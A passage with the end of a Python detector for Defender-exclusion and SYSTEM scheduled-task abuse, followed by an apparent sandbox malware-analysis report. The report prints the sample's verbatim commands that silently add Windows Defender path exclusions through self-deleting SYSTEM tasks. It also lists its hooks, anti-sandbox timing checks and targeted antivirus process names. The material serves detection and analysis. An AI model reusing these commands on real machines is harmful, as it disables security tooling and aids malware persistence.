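    r'cmd.exe|reg.exe|reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f',
    r'explorer.exe|reg.exe|reg add "HKCU\Software\Example" /v Setting /t REG_DWORD /d 1 /f',              # constructed, benign
    r'svchost.exe|schtasks.exe|SCHTASKS /Create /TN "Backup" /SC DAILY /ST 02:00 /TR "C:\Tools\backup.exe"',  # constructed, benign
]

# reg add <Defender exclusions key>\<Paths|Extensions|Processes> /v <value>:
# the value name is the excluded item, the data is a DWORD 0 (as in the report).
EXCLUSION_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?hk(?:lm|ey_local_machine)\\software\\(?:policies\\)?'
    r'microsoft\\windows defender\\exclusions\\(paths|extensions|processes)"?'
    r'.*?/v\s+(?:"([^"]*)"|(\S+))',
    re.IGNORECASE,
)
# Task registered to run as SYSTEM, and the create/run/delete one-shot pattern.
SYSTEM_TASK = re.compile(r'schtasks(?:\.exe)?\s.*?/create\b.*?/ru\s+"?system"?', re.IGNORECASE)
ONE_SHOT_TASK = re.compile(r'/sc\s+once\b.*?&\s*schtasks\s+/run\b.*?&\s*schtasks\s+/delete\b', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    image: str
    technique: str
    detail: str


def scan_command_line(image: str, command_line: str) -> list:
    # A task action nested in /TR carries escaped quotes (\"). Flatten them so the
    # regexes see the inner reg add exactly as reg.exe receives it when the task runs.
    flat = command_line.replace('\\"', '"')
    findings = []
    m = EXCLUSION_ADD.search(flat)
    if m:
        value = m.group(2) if m.group(2) is not None else m.group(3)
        findings.append(Finding(image, "defender-exclusion-add", f"{m.group(1).lower()}|{value}"))
    if SYSTEM_TASK.search(flat):
        findings.append(Finding(image, "schtasks-run-as-system", "/RU SYSTEM task creation"))
    if ONE_SHOT_TASK.search(flat):
        findings.append(Finding(image, "one-shot-task", "create, run and delete in one command line"))
    return findings


def scan_events(events) -> list:
    findings = []
    for record in events:
        _parent, image, command_line = record.split("|", 2)
        findings.extend(scan_command_line(image, command_line))
    return findings


def excluded_items(findings) -> list:
    """Exclusion value names written, de-duplicated and sorted."""
    return sorted({f.detail.split("|", 1)[1] for f in findings if f.technique == "defender-exclusion-add"})


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.image:14} {f.technique:26} {f.detail}")
```

On a real host the same records come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled. The scanner only sees exclusions added through reg.exe; the same key can be written through the registry API or PowerShell without any such command line, so pair it with Sysmon Event ID 13 (registry value set) on the Exclusions key or the Defender operational log's event 5007. A matching command line also records an attempt rather than a confirmed exclusion: with Tamper Protection enabled, Defender may reject or revert direct registry writes to this key.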
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Sections loaded (in order): apphelp.dll, pid.dll, hid.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll
Source: C:\Users\user\Documents\5oqa98.exe | Sections loaded (in order, both processes): apphelp.dll, vselog.dll, wininet.dll, vselog.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, uxtheme.dll, urlmon.dll, srvcli.dll, netutils.dll, propsys.dll, dnsapi.dll, rasadhlp.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
    vselog.dll is the DLL the initial sample drops next to 5oqa98.exe in C:\Users\user\Documents (see Persistence and Installation Behavior), so it is loaded from the executable's own directory rather than from System32.
Source: C:\Windows\System32\schtasks.exe | Sections loaded (each of the 12 schtasks.exe instances): kernel.appcore.dll, taskschd.dll, sspicli.dll; four of the instances (every third one, matching the four /Create invocations) also load xmllite.dll
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Documents\5oqa98.exe | File written: C:\Users\Public\Music\destopbak.ini
Source: 2749837485743-7684385786.05.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 2749837485743-7684385786.05.exe | Static file information: File size 30885376 > 1048576
Source: 2749837485743-7684385786.05.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59800
Source: 2749837485743-7684385786.05.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, naBa3A.exe.8.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 5oqa98.exe, 00000007.00000000.2349192191.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000002.2575168949.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000000.2365695167.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe.0.dr
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_02A4D2DD push qword ptr [rsp+rsi*2-644654D0h]; ret 8_2_02A4D337

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Users\user\Documents\5oqa98.exe
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Users\user\Documents\vselog.dll
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Users\user\Documents\5oqa98.exe
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Users\user\Documents\vselog.dll
Source: C:\Users\user\Documents\5oqa98.exe | File created: C:\Program Files (x86)\naBa3A\naBa3A.exe

Boot Survival

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\5oqa98.exe | Memory written: PID: 1488 base: 7FF9082F0008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\5oqa98.exe | Memory written: PID: 1488 base: 7FF90818D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\5oqa98.exe | Memory written: PID: 7688 base: 7FF9082F0008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\5oqa98.exe | Memory written: PID: 7688 base: 7FF90818D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\5oqa98.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | RDTSC instruction interceptor: First address: 1400010D8 second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | RDTSC instruction interceptor: First address: 1400010EF second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FEDCCBE34D0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\5oqa98.exe | RDTSC instruction interceptor: First address: 62EAF5 second address: 62EB03 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 8_2_0062EAF5 rdtsc 8_2_0062EAF5
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Window / User API: threadDelayed 583
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Window / User API: threadDelayed 416
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\5oqa98.exe | Dropped PE file which has not been started: C:\Program Files (x86)\naBa3A\naBa3A.exe
Source: C:\Users\user\Documents\5oqa98.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_7-14108
Source: C:\Users\user\Documents\5oqa98.exe | API coverage: 2.7 %
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584 | Thread sleep count: 583 > 30
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584 | Thread sleep time: -291500s >= -30000s
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584 | Thread sleep count: 416 > 30
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584 | Thread sleep time: -208000s >= -30000s
Source: C:\Users\user\Documents\5oqa98.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5DA1B8 FindFirstFileExW,7_2_00007FF8FF5DA1B8
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 5oqa98.exe, 00000008.00000002.2572103669.0000000000570000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW P]%SystemRoot%\system32\mswsock.dllRR?:P
Source: C:\Users\user\Documents\5oqa98.exe | API call chain: ExitProcess graph end node graph_7-14109
Source: C:\Users\user\Documents\5oqa98.exe | API call chain: ExitProcess graph end node graph_7-14453
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 8_2_0062EAF5 rdtsc 8_2_0062EAF5
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00000001400073E0 LdrLoadDll,7_2_00000001400073E0
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,7_2_0000000140004630
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000001400106B0
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00000001400092E0 SetUnhandledExceptionFilter,7_2_00000001400092E0
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5D1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF8FF5D1F50
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5D2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FF5D2630
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5D76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FF5D76E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Documents\5oqa98.exe | NtAllocateVirtualMemory: Indirect: 0x140006FD0
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | NtDelayExecution: Indirect: 0x1F94D2
Source: C:\Users\user\Documents\5oqa98.exe | NtProtectVirtualMemory: Indirect: 0x2B3B253
Source: C:\Users\user\Documents\5oqa98.exe | NtProtectVirtualMemory: Indirect: 0x2ADB253
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5DFD40 cpuid 7_2_00007FF8FF5DFD40
Source: C:\Users\user\Documents\5oqa98.exe | Code function: GetLocaleInfoA,7_2_000000014000F370
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_000000014000A370
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_0000000140005A70
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: kxetray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: vsserv.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: avcenter.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: KSafeTray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: 360Safe.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: 360tray.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: rtvscan.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: ashDisp.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: avgwdsvc.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: AYAgent.aye
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: QUHLPSVC.EXE
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: RavMonD.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: 5oqa98.exe, 5oqa98.exe, 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,7_2_00000001400042B0
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,7_2_0000000140003F80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (2) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (1) | Credential API Hooking (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (11) | Windows Service (24) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | LSASS Memory | File and Directory Discovery (3) | Remote Desktop Protocol | Credential API Hooking (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Access Token Manipulation (1) | Obfuscated Files or Information (2) | Security Account Manager | System Information Discovery (123) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Service Execution (12) | Login Hook | Windows Service (24) | DLL Side-Loading (1) | NTDS | Security Software Discovery (141) | Distributed Component Object Model | Input Capture | Application Layer Protocol (3) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (11) | Masquerading (32) | LSA Secrets | Virtualization/Sandbox Evasion (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Scheduled Task/Job (1) | Modify Registry (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
